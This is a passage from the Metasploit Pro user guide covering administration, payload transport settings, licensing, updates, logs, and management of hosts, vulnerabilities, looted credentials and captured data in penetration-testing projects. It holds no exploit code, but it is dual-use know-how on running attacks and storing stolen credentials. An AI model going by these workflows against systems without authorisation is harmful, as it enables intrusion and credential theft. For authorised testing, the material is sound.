All accounts must meet the user name and password requirements. If the user name or password does not meet one of the following criteria, Metasploit Pro displays an error until you input a user name and password that complies with every requirement.
User Name Requirements

A user name can contain any combination of the following characters:
l
Alphanumeric characters Spaces Non-alphanumeric characters (!@#$%^&*()+,.?/<>)
Password Requirements
A password must meet the following criteria:
l
Contains letters, numbers, and at least one special character. Contain at least eight characters. Cannot contain the user name. Cannot be a common password. Cannot use a predictable sequence of characters
Account Requirements
36
System Management
As an administrator, you have to update and maintain Metasploit Pro to ensure that you have the latest bug fixes, features, and modules. There are a couple of ways to determine when an update is available. You can view the Product News panel to learn when the Metasploit team has released an update, or you can set up an alert that appears when an update is available to install. Additionally, as a administrator, you can configure the global settings that apply to all projects. The global settings include payload settings, mail server settings, API keys, listeners, Nexpose consoles, and Metasploit services.
Global Settings
Global settings define settings that all projects use. You can access global settings from the Administration menu. From the global settings, you can set the payload type for the modules and enable access to the diagnostic console through a web browser. Additionally, from global settings, you can create API keys, post-exploitation macros, persistent listeners, and Nexpose Consoles.
Setting HTTP Payloads

If you want Metasploit Pro to communicate over TCP without encryption, you can set it to use HTTP payloads. HTTP payloads are useful for client-side attacks or social engineering campaigns. They are the most reliable way to communicate with a target machine, but they do not provide any level of stealth. For example, if a victim is behind a proxy and has to use the proxy to connect back to the attacking machine, you should enable the HTTP payload option. This ensures that Metasploit can create a connection between attacker and the victim. 1. Choose Administration > Global Settings from the Main menu.
2. Select payload_prefer_http from the Global Settings.
System Management
37
3. Update the settings.
Setting HTTPS Payloads

By default, Metasploit communicates over a standard TCP connection with SSL. HTTPS payloads provide you with some level of stealth, but the payloads may not be as reliable as HTTP payloads. This configuration generally works well in most cases, but if the target is behind a proxy, the proxy may not be able to handle the SSL connection properly. If you know that the target is behind a proxy, you should not use HTTPS payloads. You should use HTTP payloads instead. If you want Metasploit Pro to always try to encrypt the HTTP connection, you can set it to use HTTPS based payloads. 1. Choose Administration > Global Settings from the main menu.
2. Choose payload_prefer_https from the Global Settings.
Setting HTTPS Payloads
38
Enabling Automatic Updates

If you want an alert to appear when an update is available, you must enable the automatic update option. When an update is available for you to download, a small notification icon will appear in the Main menu bar. By default, this option is enabled. 1. Choose Administration > Global Settings from the main menu.
2. Choose automatically_check_updates from the Global Settings.
Disabling Automatic Updates

If you want do not want an alert to appear when an update is available, you must disable the automatic update option. 1. Choose Administration > Global Settings from the Main menu.
2. Deselect automatically_check_updates from the Global Settings.
Enabling Automatic Updates
39
Automatically Enabling an HTTP Proxy for Updates

1. Choose Administration > Global Settings from the Main menu.
2. Choose use_http_proxy from the Global Settings.
3. Update the settings. The settings that you define automatically fill the HTTP proxy server settings when you perform an update.
Defining SMTP Settings for a Mail Server

To send e-mail from Metasploit Pro, you must configure the SMTP settings for the mail server that you want to use. The tasks that utilize the SMTP settings are social engineering and reporting. For example, if you want to e-mail a report after you generate a report, you need to configure the SMTP settings. The sender for reports is reports@pro.metasploit.com. You may want to add this e-mail address to the safe sender list to ensure that these e-mails are not moved to the Junk Mail folder.
Automatically Enabling an HTTP Proxy for Updates
40
In order to utilize e-mail capabilities, you must have access to a local mail server or a web mail server. You need the address and port that the mail server runs on, the domain name that hosts the mail service, and the credentials for the mail server. 1. Choose Administration > Global Settings from the main menu.
2. Under SMTP Settings, define the following fields:
Address - The address to the remote mail server. For example, use 127.0.0.1 or localhost if the mail server runs on your local machine. Port - The port that the mail server uses. The default port is 25. Domain - The fully qualified domain name that hosts the mail server. For example, use sitename.com. User Name - The user name that the system uses to authenticate the mail server. Password - The password that the system uses to authenticate the mail server. Authentication - The authentication type that the mail server uses. Choose from plain, login, and cram_md5.
3. Click the Update button.
Defining SMTP Settings for a Mail Server
41
Removing Metasploit
When you uninstall Metasploit Pro, you remove the Metasploit components and modules from the system and delete the data stored within the projects. If you remove Metasploit Pro, you will no longer be able to access or view any information that projects contain. Therefore, before you remove Metasploit Pro and its components, you should export any data that you may want to save, such as the reports and host data that you want to save.
Removing Metasploit from Windows Systems

1. Navigate to Start > All Programs > Metasploit. 2. Click Uninstall Metasploit.
3. Click Yes to confirm that you want to delete all saved project data. 4. Click OK when the process completes.
Removing Metasploit from Linux Systems

1. Open the command line terminal. 2. Use the cd command to change the directory path to the Metasploit directory. If you installed Metasploit in the default directory, type the following: user@computer: $ cd ~/opt/metasploit-4.4.0 Note: Replace the version number with your version number. 3. Type the following to stop all Metasploit services and press Enter: $./ctlscript.sh.stop 4. Type the following to uninstall Metasploit and all its components $ ./uninstall
Removing Metasploit
42
5. Click Yes to confirm that you want to uninstall Metasploit Pro components and modules. 6. Click Yes to confirm that you want to delete the data saved in the projects. If you click No, the $INSTALLER_ROOT/apps directory remains intact, and you can continue to access the Metasploit data stored in this directory.
Removing Metasploit
43
License Keys
A license key defines the commercial edition and the registered owner of Metasploit Pro. Metasploit Pro uses the license key to identify the number of days that remain on the license and the number of users that the license key allows. Metasploit licenses are perpetual licenses, which enable you to use the application indefinitely. However, the license itself expires every year. When the license expires, you must renew the license if you want to continue to receive updates for Metasploit. You can still run Metasploit, but you can only run the last version that was released before your license key expired. To access the license key area, select Administration >SoftwareLicense from the Global Menu.
Getting a License Key

If you purchased Metasploit Pro and have not received your license key from Rapid7, you can e-mail the sales team at sales@rapid7.com. Otherwise, you can select Administration >Software License from the Main menu, and click on the Get Product Key button.
When the license key request page appears, choose whether you want to trial Metasploit Pro or obtain a Metasploit Community license key.
License Keys
44
Activating a License Key for the First Time

1. Open a browser and go to https://localhost:3790 if you installed Metasploit Pro on your local system or enter https://<IP address>:3790 if you installed Metasploit Pro on a remote machine.
Note: 3790 is the default port that the Metasploit service uses. If you assigned the Metasploit service to a different port during the installation process, use that port instead.
Activating a License Key for the First Time
45
2. If you receive a warning about the trustworthiness of the security certificate, select that you understand the risks and want to continue to the website. The wording that the warning displays depends on the browser that you use.
3. When the web interface for Metasploit Pro appears, the New User Setup page displays if this is a first time activation. Follow the onscreen instructions to create a user account for Metasploit Pro. Save the user account information so that you can use it later to log in to Metasploit Pro. 4. After you create a user account, the Activate Metasploit page appears. Enter the license key that you received from Rapid7 in the Product Key field. Note: If you need to use an HTTP proxy to reach the Internet, you can select the HTTP proxy option and provide the information for the HTTP proxy server that you want to use.
5. Click the Activate License button. After you activate the license key, the Projects page appears.
Updating a License Key

If the license key for Metasploit Pro expires or if you need to enter a product key for a different Metasploit product, you can change the license key that the system currently uses. 1. Choose Administration > Software Licenses from the main menu.
Updating a License Key
46
2. Enter the license key in the Product Key field.
3. Activate the license.
Performing an Offline Activation

If you do not have network access, use the offline activation file to activate Metasploit Pro. To obtain an offline activation file, contact our sales team at sales@rapid7.com. 1. Choose Administration > Software License from the main menu.
2. Click the Offline Activation link.
Performing an Offline Activation
47
3. When the Offline Activation window appears, browse to the location of the activation file. 4. Select the activation file. 5. Click Activate Product to complete the activation.
Reverting to the Previous License Key

You can revert to the previous license key if Metasploit Pro detects that a previous license key exists on the system. Use license key reversion to switch between different versions of Metasploit products. For example, if you install a trial version of a Metasploit product, use license key reversion to switch back to the full version. 1. Choose Administration > Software Licenses from the Main menu.
2. If the system detects that there is a previous license key, you will see the Revert to Previous License area. Click Revert License. The License Details window appears after the system successfully reverts to the previous license key.
48
49
Services
If you attempt to launch Metasploit Pro, and you receive the Metasploit is initializing message," you may need to restart the Metasploit services. This error typically occurs after you install or update Metasploit Pro. If you have recently installed Metasploit Pro, you may need to wait a few minutes for it to load after the installation completes. If it has been more than fifteen minutes since the installation finished, you should restart the Metasploit services. If you recently updated Metasploit Pro, the services were automatically restarted after the update completed. You should wait a few minutes to see if the Metasploit services start up again. If they do not, you should manually restart the services.
Restarting Metasploit Services on Windows

To restart the Metasploit service on Windows systems, you must stop the Metasploit services before you can start them again. When you stop and start the Metasploit services, a few command line windows appear. These prompts run a control script that stop and start all Metasploit services, which include PostgreSQL, thin, and prosvc. This is a two step process. 1. Choose Start > Programs > Metasploit > Services > Stop Services. Note: If the system prompts you to allow the program to make changes to the computer, click Yes. 2. Choose Start > Programs > Metasploit > Services > Start Services.
Restarting Metasploit Services on Linux

1. Open the command line terminal. 2. Use the cd command to change the directory path to the Metasploit directory location. If you installed Metasploit in the default directory, type the following: $ cd /opt/metasploit-4.4.0 Note: Replace the version number with your Metasploit version. 3. Enter the following and press Enter: $ sudo bash ctlscript.sh restart
Services
50
4. Enter your sudo password when the system prompts you for it. After you enter the sudo password, the system stops and restarts all services associated with Metasploit. This includes prosvc, thin, and PostgreSQL. After the system restarts the services, wait a few minutes before you access the Metasploit Web Interface.
Restarting Metasploit Services on Linux
51
Logs
Metasploit Pro stores system events in log files. You can use the information in the log files to troubleshoot issues with Metasploit Pro. For example, if you need to troubleshoot an issue with updates, you can view the license log to see a list of events related to product activation, license keys, and updates. Please note that log files can become large over time. To reduce the amount of disk space the log files consume, regularly review and clear log files. Use the following log files to troubleshoot issues with Metasploit Pro:
l
Framework log - Details information about loading the Metasploit Framework. Use this log to troubleshoot issues with modules. License log - Details product licensing, and product updates. Use this log to troubleshoot problems that you may have with applying a license key or installing an update. PostgreSQL log - Details the start up and shutdown notices. Use this log to troubleshoot SQL query bugs and to understand the current state of the database. Production log - Details all Rails actions, such as the refresh data and routing errors. Use this log to troubleshoot Rails issues and to trace the actions that were taken for a particular connection. Pro service error log - Details errors for the Metasploit Pro service engine. Use this log to troubleshoot errors with the Metasploit service. Thin log - Details the location of the PID file. Use this log to diagnose issues between Rails and Nginx. Web server error log - Details Nginx errors. Use this log to determine if an issue is related to Nginx rather than Rails or Pro Service. Web server access log - Details every GET and POST request to Nginx and logs successful HTTP requests. Use this log to track down Rails issues.
Log File Locations

You can access the log files in the following directories:
l
Frameworklog - $INSTALL_ROOT/apps/pro/engine/config/logs/framework.log License log - $INSTALL_ROOT/apps/pro/engine/license.log Productionlog - $INSTALL_ROOT/apps/pro/ui/log/production.log Pro service log - $INSTALL_ROOT/apps/pro/engine/prosvc.log Tasks log - $INSTALL_ROOT/apps/pro/engine/tasks
Logs
52
Thin log - $INSTALL_ROOT/apps/pro/ui/log/thin.log Web server error log - $INSTALL_ROOT/apache2/logs/error_log Web server access log - $INSTALL_ROOT/apache2/logs/access_log
Log File Locations
53
System Updates
In order to keep your copy of Metasploit Pro up to date with the latest fixes, enhancements, and modules, you need to install system updates when they are available. When there is a new update available, Metasploit Pro flashes a real-time alert in the Main menu. The Metasploit team typically releases weekly updates, so you need to update Metasploit Pro regularly to get the latest code base. Note: If you do not see update alerts, you will need to change the system settings to allow the alerts to display.
System Updates
54
Notification Center
Notification Center is the notification system for Metasploit Pro that alerts you when a task completes or when a software update is available. It displays as a dropdown banner from the Global Menu and provides a unified view of system-wide alerts for all projects. The Notification Center icon displays the total number of new alerts that are available. All new notifications are highlighted with a green bar. You can click on a notification to access the associated page in the user interface. Most task and MetaModule notifications will take you to the Task log. All system notifications will take you to the Software Updates page.
Accessing NotificationCenter
To access Notification Center, click on the notification icon in the upper-right hand corner of the Global Menu.
Notification Events
Notification Center displays alerts when the following events occur:
l
A MetaModulerun completes. A task run, such as a Discovery Scan or Bruteforce Attack, completes. A software update is available.
Sorting Notifications by Event Type

1. From the Global Menu, click the Notification Center icon.
Notification Center
55
2. Click the Show dropdown button and choose the event type you want to use to sort the notifications. You can choose from MetaModules, Tasks, and System.
3. After you choose an event type, Notification Center updates the alerts.
Clearing a Notification
1. From the Global Menu, click on theNotificationCenter icon.
2. Find the alert that you want to remove.
Clearing a Notification
56
3. Hover your mouse over the alert. A delete button appears.
4. Click the 'X' button to remove the alert.
Updating the System

The Metasploit team releases weekly updates that include bug fixes, new modules, and feature enhancements. If you have administrator privileges, you should regularly check for software updates and apply the updates to the system. This ensures that you have the latest code from the Metasploit Framework and access to the newest modules and features. The installer for Metasploit Pro does not contain the latest updates to code base. You must manually apply updates to the system to keep Metasploit Pro current. For example, if you recently installed Metasploit 4.4, you have the code base that was originally released. You do not have the modules or fixes that have been provided in subsequent updates. Therefore, you need to check to see if there is an update available and apply the update to the system.
Updating the System After Installation

If you recently installed Metasploit Pro, you should immediately check to see if an update is available. The Metasploit installer does not include the latest software updates for the Metasploit Framework. So, if you do not update Metasploit Pro after you install, you may not have the most current code from the Metasploit Framework. 1. Click Administration > Software Updates from the main menu.
Updating the System
57
2. When the Software Updates window appears, select the Use an HTTP Proxy to reach the internet option if you want to use an HTTP proxy server to check for updates. If you select this option, the proxy settings appear. Configure the settings for the HTTP proxy that you want to use. 3. Click the Check for updates button. If an update is available, the system shows you the latest version number and provides an install button for you to use to update the system.
4. Install the update.
Updating Metasploit Offline

Rapid7 provides offline update files that you can use to safely update Metasploit Pro and Metasploit Express without an Internet connection. For each major release, Rapid7 e-mails you the links and instructions that you need to update Metasploit. The links point you to bin files that you can download and save to a portable storage device or shared network location so that you can easily transfer the file to your Metasploit server. In order to update Metasploit to the latest version, you must install each incremental release between your current version and the latest version. For example, if your current version of Metasploit is 4.5.2, you need to apply the 4.5.3 update before you can apply the 4.6 update. If you do not apply the updates sequentially, product dependencies may not be upgraded correctly and can cause issues with Metasploit.
To apply an offline update:

1. Launch and log in to Metasploit. 2. Locate the footer at the bottom of the user interface.
58
3. Identify the current release version of Metasploit that you have installed.
Note: You will see the product edition, the release version, and the update version. For example, in Metasploit Pro 4.6.0 - update 2013050101, the release version is 4.6.0. 4. From the e-mail that you have received from Rapid7, find and download the offline update files that you need. 5. From within Metasploit, select Administration > Software Updates from theGlobal menu.
6. Find the Product Updates area.
59
7. Click the Offline Update File link.
8. Browse to the location of the offline update file and select it.
The offline update file is the bin file that you downloaded from the Rapid7 e-mail. 10. Click the InstallUpdate button.
Metasploit installs the update and restarts the Metasploit service when the update is done. Please wait a few minutes for the service to restart. If there are additional updates that you need to install, you must repeat this process until you have the latest version of Metasploit.
60
Applying the Weekly Update

If you are an administrator, you should regularly check for available updates to Metasploit Pro. From the Web UI, Metasploit Pro alerts you when a newer version is available for you to install. If a newer version of Metasploit Pro is not available, the system notifies you that you have the latest version. 1. Click Administration > Software Updates from the main menu. 2. When the Software Updates window appears, select Use an HTTP Proxy to reach the Internet if you want to use an HTTP proxy server to check for updates. If you select this option, the proxy settings appear. Configure the settings for the HTTP proxy that you want to use. 3. Click the Check for updates button.
4. If an update is available, the system shows you the latest version number and provides an install button for you to use to update the system.
5. Install the update. After the update completes, Metasploit Pro prompts you to restart the back end services. If you restart the services, Metasploit Pro terminates active sessions and requires up to ten minutes to restart.
Deleting the Browser Cache After an Update

After you update Metasploit Pro, you must delete your browsers cache so that the user interface renders correctly. If you do not delete your browsers cache, some items may not display or appear distorted. To learn how to delete your browsers cache, read the documentation for your specific browser or visit this handy website.
61
Chapter 4:
Host Management
In Metasploit Pro, a host refers to a device on a network and is represented by its IP address or server name. Hosts are typically fingerprinted, enumerated, and added to a project during a Discovery Scan, data import, or Nexpose Scan. To view the hosts in a project, you need to go to the Analysis area. All hosts stored in the project will be viewable, searchable, and editable from the Analysis area of the user interface. To view the hosts in a project, you need to go to the Analysis area. All hosts stored in the project will be viewable, searchable, and editable from the Analysis area of the user interface. To learn more about host management, read the following topics:
l
Host Management Interfaces on page 63 Viewing and Editing Host Metadata on page 65 Adding, Editing, and Deleting Services on page 71 Adding, Editing, and Deleting Vulnerabilities on page 75 Host Management on page 62 Adding, Editing, Download, and Deleting Captured Data on page 91
Chapter 4: Host Management
62
Host Management Interfaces

Metasploit Pro offers a couple of different host views. Host views provide visibility into the data that a project contains. Each view provides a different way in which you can view the metadata and findings for hosts within a project. The following host views are available:
l
Project view - Provides a high-level view of all the hosts and data that are stored in the project. To access the project view, click on the Analysis tab. The project view initially shows the Hosts list, which displays the fingerprint and enumerated ports and services for each host. In addition to the Hosts list, you can view the notes, services, vulnerabilities, and captured data from the project view. To access these other views, you can click on their tabs from the project view. Single host view - Displays the details for a specific host, such as the services, sessions, vulnerabilities, credentials, captured data, notes, file shares, tags, exploit attempts, available modules, and source. To access the single host view, click on a host IP address.
Tour of the Analysis Area

The Analysis area shows the test findings on a project level. The Analysis area shows you all of the information that has been gathered and tracked for a particular project. For example, you will want to go to the Analysis area if you want to see a list of hosts that were discovered or imported, view the captured data stored in the project, or create Nexpose vulnerability exceptions. From the Analysis area, you can navigate to the following main pages:
l
Hosts page - Lists all the hosts in a project and shows their operating system, purpose, tags, and counts for services and vulnerabilities. Notes page - Lists the notes, or additional bits of information, that Metasploit Pro was able to collect from a host during a scan. Services page - Lists the services that were enumerated and shows their port number, port state, and the host that it is running on. Vulnerabilities page - Lists the vulnerabilities that have been imported from a vulnerability scanner or ones that have been found by Metasploit Pro. You can create vulnerability exceptions and push validated vulnerabilities back to Nexpose from the Vulnerabilities page. Captured Data page - Lists all the loot and evidence that was collected from all hosts in the project. You can view or download captured data files from this page. Network Topology - Shows a diagram of the physical layout of a target network.
Host Management Interfaces
63
Tour of the Single Host Page

The single host page shows the findings on a per host level. Use this view to drill down to the details for a particular host. For example, you will want to view the single host when you want to view the credentials, services lists, or open/closed sessions for a host. To access the single host page, click on the IP address for any host.
Tour of the Single Host Page
64
Viewing and Editing Host Metadata

Each host has metadata that helps you identify its network details and its operating system. You can view the host metadata to learn more about the identifiable attributes for a particular host or you can edit the host metadata if there are additional details you want to provide about the host.
Viewing Host Metadata
To view metadata for a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host you want to view the host information for.
3. Click on the Edit icon. The Host Information window displays the metadata for the host.
Viewing and Editing Host Metadata
65
Editing Host Information
To edit the metadata for a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host that you want to edit.
3. Click on the Edit icon. The Host Information window displays the metadata for the host.
4. Click on the Edit icon for the metadata field you want to add or modify. The field becomes editable.
Note: Note: The following metadata fields can be edited: host address, host name, host MAC address, OS name, OS flavor, OS service pack, and OS purpose.
66
5. Enter the information you want to use in the field. For example, if you know the service pack, you can add it to the SP field. 6. Click the Save link when you are done.
7. Click the Done button to close the Host Information window.
67
Adding and Deleting Hosts

There are a few ways that hosts can be automatically added to a project: through a Discovery Scan, Nexpose Scan, or import. When you run a scan or import, Metasploit Pro gathers host information and stores it in the project database. If there are specific hosts that you want to add, without running a scan or import, you can manually add them to a project. Or if there are hosts that you scanned or imported that you do not want to include in the project, you can simply delete them.
Adding a Host to a Project
To add a host to a project:

1. Select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click the New Host button from the Quick Tasks bar. The New Host form appears.
3. Fill out the Name and Address section with the host's network details. At a minimum, you will need to specify the host name and host IP address.
4. Fill out the Operating System section, if you know the OS that runs on the host. If you do not have this information, you can skip this step. Note: Note: You can additionally specify the OS version, OS flavor, and Purpose. These fields are optional.
Adding and Deleting Hosts
68
5. Select the Lock edited host attributes option if you do not want the host metadata to be editable. If you select this option, team members and subsequent scans/imports will not be able to modify the host metadata.
6. Click on the Add Service link, if you know there is a specific service running on the host that you want to add. You can add as many services as you need.
7. Click the Save button when you are done.
Adding a Host to a Project
69
Deleting a Host from a Project
To delete a host from a project:

1. Select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Select the host or hosts that you want to delete.
3. Click the Delete button. A confirmation window appears.
4. Click OK to delete the host or hosts.
Deleting a Host from a Project
70
Adding, Editing, and Deleting Services

The Services list is populated when you run a scan or import hosts into a project. However, there may be cases where you may want to manually modify the services list. You can add, edit, or modify the services list for any host.
Adding a Service to a Host
To add a service to a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host that you want to add a service to. The single host page opens and shows the Services list.
3. Click the New Service button. The New Service modal window appears.
Adding, Editing, and Deleting Services
71
4. Specify the following information for the service:
Name - The service name, such as HTTP, DNS, or SMTP. Port - The port that the service runs on. Protocol - The protocol, TCP or UDP, that the port uses. State - The port state can be open, closed, filtered, or unknown. Info - Any additional information that you may have about the service, such as the version that is running.
5. Click the Submit button when you are done.
Adding a Service to a Host
72
Editing a Service
To edit a service:
1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host whose services you want to edit. The single host page opens and shows the Services list.
3. Click the Edit icon that is located in the same row as the service you want to modify. The Name, Port, Protocol, and State fields become editable.
4. Make your changes to any of the editable fields.
5. Click the Save link when you are done.
Editing a Service
73
Deleting a Service from a Host
To delete a service from a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host that you want to delete a service from. The single host page opens and shows the Services list.
3. Find the service that you want to delete. 4. Click the Delete button that is located in the same row as the service. A confirmation window appears.
5. Click OK to delete the service.
Deleting a Service from a Host
74
Adding, Editing, and Deleting Vulnerabilities

In order to identify potential vulnerabilities that may exist on a target network, you will need to run a Nexpose scan, run a Discovery Scan, or import vulnerability scan data. Metasploit Pro stores the vulnerability information that it finds for each host in the project. Vulnerabilities can be viewed and managed at the project level or at the host level.
Adding a Vulnerability to a Host
To add a vulnerability to a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host that you want to add a vulnerability to. The single host page appears.
3. Click the Vulnerabilities tab. The Vulnerabilities list appears.
Adding, Editing, and Deleting Vulnerabilities
75
4. Click the New Vuln button. The New Vulnerability modal window appears.
5. Enter a name for the vulnerability in the Name field.
6. Click the Add Ref button. The Reference field becomes editable.
7. Enter the vulnerability reference ID or URL in the reference field.
8. If you have additional references you would like to add for the vulnerability, click on the Add Ref button and repeat the previous step. 9. Click the Submit button when you are done.
Adding a Vulnerability to a Host
76
Adding a Vulnerability Reference
To add a reference ID to vulnerability:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host that has the vulnerability you want to add a reference to. The single host page appears.
4. Click the Edit icon that is located in the same row as the vulnerability you want to edit. The Edit Vulnerability window appears.
Adding a Vulnerability Reference
77
5. Click the Edit icon. The Reference field becomes editable.
6. Edit the vulnerability reference ID or URL. 7. Click the Submit button when you are done.
Deleting a Vulnerability Reference
To delete a reference ID from a vulnerability:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host that has the vulnerability you want to delete a reference from. The single host page appears.
78
4. Click the Edit icon that is located in the same row as the vulnerability you want to edit.
5. Find the reference you want to delete and click the Delete icon. The reference is removed from the list. Note: If you have additional references you would like to delete, repeat the previous step until you are done.
6. Click the Submit button when you are done.
79
Deleting a Vulnerability from a Host
To delete a vulnerability from a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host that has the vulnerability you want to delete. The single host page appears.
4. Click the Delete icon that is located in the same row as the vulnerability you want to remove. A confirmation window appears.
5. Click OK to delete the vulnerability. The vulnerability is removed from the list.
Deleting a Vulnerability from a Host
80
Deleting a Vulnerability from All Hosts
To delete a vulnerability from the project:

1. From within a project, select Analysis > Vulnerabilities from the Project Tab bar. The Vulnerabilities page appears.
2. Click the Grouped View button in the Quick Tasks bar. The project displays the individual vulnerabilities in the project.
3. Select the vulnerabilities you wan to delete from the project. Note: When you delete vulnerabilities from the grouped view, it removes them from all of the hosts that currently have them.
4. Click the Delete Vulnerabilities button in the Quick Tasks bar. A confirmation window appears.
81
5. Click OK to continue with the deletion.
82
Adding, Editing, and Deleting Credentials

In Metasploit Pro, a credential pair refers to user name and password combination that can be used to authenticate to systems, accounts, and services. The user name is the login name that identifies a user, and the password can be a plain text password, hash, or SSH key. Generally, credentials can be bruteforced, looted from exploited systems, or collected using social engineering technique. If you have a passwords list, user names list, username/password list, PWDump, or SSH key, you can import them into a project. Credentials can be managed on a project-level or at the host level.
Viewing Credentials for a Project
To view the credentials for a project:

1. From within a project, click on the Overview tab from the Project Tab bar. The Dashboard appears. 2. Click the Bruteforce button located in the Quick Tasks bar. The Bruteforce configuration page appears. 3. Scroll down to the bottom of the Bruteforce configuration page and locate the Authentication TokenDetails list. All credentials that are stored in the project will be listed here.
Adding, Editing, and Deleting Credentials
83
Viewing Credentials for a Host
To view the credentials for a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host whose credentials you want to view. The single host page appears.
3. Click the Credentials tab. The Credentials list appears.
What information does the Credentials list show?

The Credentials tab shows the following information:
l
Timestamp - Time the credential was added to the project. Service - The service that was authenticated with the credentials. Type - The type of loot collected, such as read/write password, read-only password, SMBhash, SSH public key, or SSHprivate key.
Viewing Credentials for a Host
84
User - The user name that can be used to authenticate a service. Password, Hash, or SSH Key Fingerprint - The plaintext password or raw data for an SMBhash or SSH key that can be used to authenticate a service. Source Credential or Session - Indicates how the loot was obtained. Sources can be one of the following:
l
Guessed - The source type indicates that the credentials were obtained from a bruteforce attack. Imported - The source type indicates that the credentials were obtained from a credentials list import. Unverified - The source type indicates an inactive credential. Unknown - The source type indicates that Metasploit Pro was unable to find a source match. <User:pass> - The source type indicates that the credential pair was created by from another credential pair. Link to a session - The source type indicates that the credentials were obtained from collecting evidenced from an active session.
Adding a Known Credential Pair
To add a known credential pair to a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host that you want to add a credential to. The single host page appears.
85
4. Click the New Cred button. The New Credentials modal window appears.
5. Specify the following information for the service:

l
Service - The service that can be authenticated with the credentials. The most common ports and services are listed for you to choose from. Type - The type of credentials that you are adding. Choose between the following credential types: read/write, read-only, SMB hash, SSH private key, and SSH public key. User - The user name for the credential pair. Password - The password, hash, or key for the credential pair. Note: You can leave the user name and passwords fields empty for blank credentials. If you are adding an SSH key, you will need to copy and paste the contents of the key into the Password field.
86
6. Click the Submit button when you are done. The credential pair is added to the Credentials list.
Editing a Credential Pair
To edit a credential pair:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host whose credentials you want to edit. The single host page appears.
87
4. Click the Edit icon that is located in the same row as the credential pair you want to modify. The Service, Type, User, and Password fields become editable.
5. Make your changes to any of the editable fields.
6. Click the Save link when you are done.
88
Deleting a Credential Pair from a Host
To delete a credential pair from a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host whose credentials you want to delete. The single host page appears.
4. Find the credential pair that you want to delete.
89
5. Click the Delete button that is located in the same row as the credential pair. A confirmation window appears.
6. Click OK to delete the service.
90
Adding, Editing, Download, and Deleting Captured Data

Captured data refers to evidence that was either imported into the project or gathered during evidence collection. These are files that provide evidence to support your findings and recommendations. Some examples of captured data include screenshots and system files. You can manage captured data on a project level or at the host level.
Adding Captured Data to a Host
To add captured data to a host:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host you want to add captured data to. The single host page appears.
3. Click the Captured Data tab. The Captured Data list appears.
Adding, Editing, Download, and Deleting Captured Data
91
4. Click the New Captured Data button. The New Captured Data modal window appears.
5. Click the Choose File button to navigate to the location of the file you want to upload. Note: You can upload any type of loot that you've collected, such as password files, screenshots, and system files.
6. Enter a name for the file in the Name field. By default, this field is populated with the original file name. 7. Enter the content type. For example, the content type can be any of the supported MIME content types, like text/plain, image/jpeg, or text/html. 8. Enter any additional information you want to provide about the file in the Info field. 9. Click Submit when you are ready to upload the file.
Adding Captured Data to a Host
92
Downloading a Captured Data File
To download captured data:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host you want to download captured data from. The single host page appears.
4. Find the captured data file you want to download. If you have more than 10 files, you can either click on the page numbers to navigate through the captured data files or you can increase the number of entries that the page displays. 5. Click the Download link that is located in the same row as the file you want to download. The file is downloaded and saved to your local system.
Downloading a Captured Data File
93
Viewing a Captured Data File
To view a captured data:

1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears. 2. Click on the IP address for the host you want that has the captured data file you want to view. The single host page appears.
4. Find the captured data file you want to view. If you have more than 10 files, you can either click on the page numbers to navigate through the captured data files or you can increase the number of entries that the page displays.
5. Click the View link that is located in the same row as the file you want to download. The file opens in a modal window.
Viewing a Captured Data File
94
Viewing All Captured Data in a Project
To view all captured data in a project:

l
From within a project, select Analysis > Captured Data from the Project Tab bar. The Captured Data page appears and lists all files that are stored in the project. You can download or view files directly from the Captured Data page.
Deleting Captured Data from a Project
To delete captured data from a project:

1. From within a project, select Analysis > Captured Data from the Project Tab bar. The Captured Data page appears and lists all files that are stored in the project. 2. Select the files you want to delete. 3. Click the Delete Evidence button in the Quick Tasks bar.
Viewing All Captured Data in a Project
95
Chapter 5:
Projects
The first step to set up a penetration test is to create a project. A project represents the workspace that you use to create and run a test. You create projects to separate your tests and engagements into logical groupings.
l
About Projects on page 97 Project Management on page 98 Team Collaboration on page 109 Host Comments on page 112
About Projects
A project contains the workspace that you use to perform the different steps for a penetration test and store the data that you collect from the target. You create a project to configure tasks and to run tests. You can create as many projects as you need, and you can switch between projects while tasks are in progress. From within a project, you define the target systems that you want to test and configure the tasks that you want to run against those targets. for example, you can scan targets for active services and hosts, attempt to exploit vulnerabilities, collect data from exploited machines, and generate reports that detail your findings. Every project has an owner. The owner can choose the users who can access the project to edit, view, and run tasks. However, users with administrative access can view and edit any project, regardless of whether or not the project owner gives them access. You can create projects to separate an engagement into logical groupings. Oftentimes, you may have different requirements for the various departments, or subnets, within an organization. Therefore, it may be more efficient for you to have different projects to represent those requirements. For example, you may want to create a project for the human resources department and another project for the IT department. Your requirements for these departments may vary greatly, so it would be logical for you to separate the targets into different projects. At the end of the engagement, you can generate separate reports for each department to perform a comparative analysis and present your findings to your organization or client.
Project Components
The following components are part of a project:
l
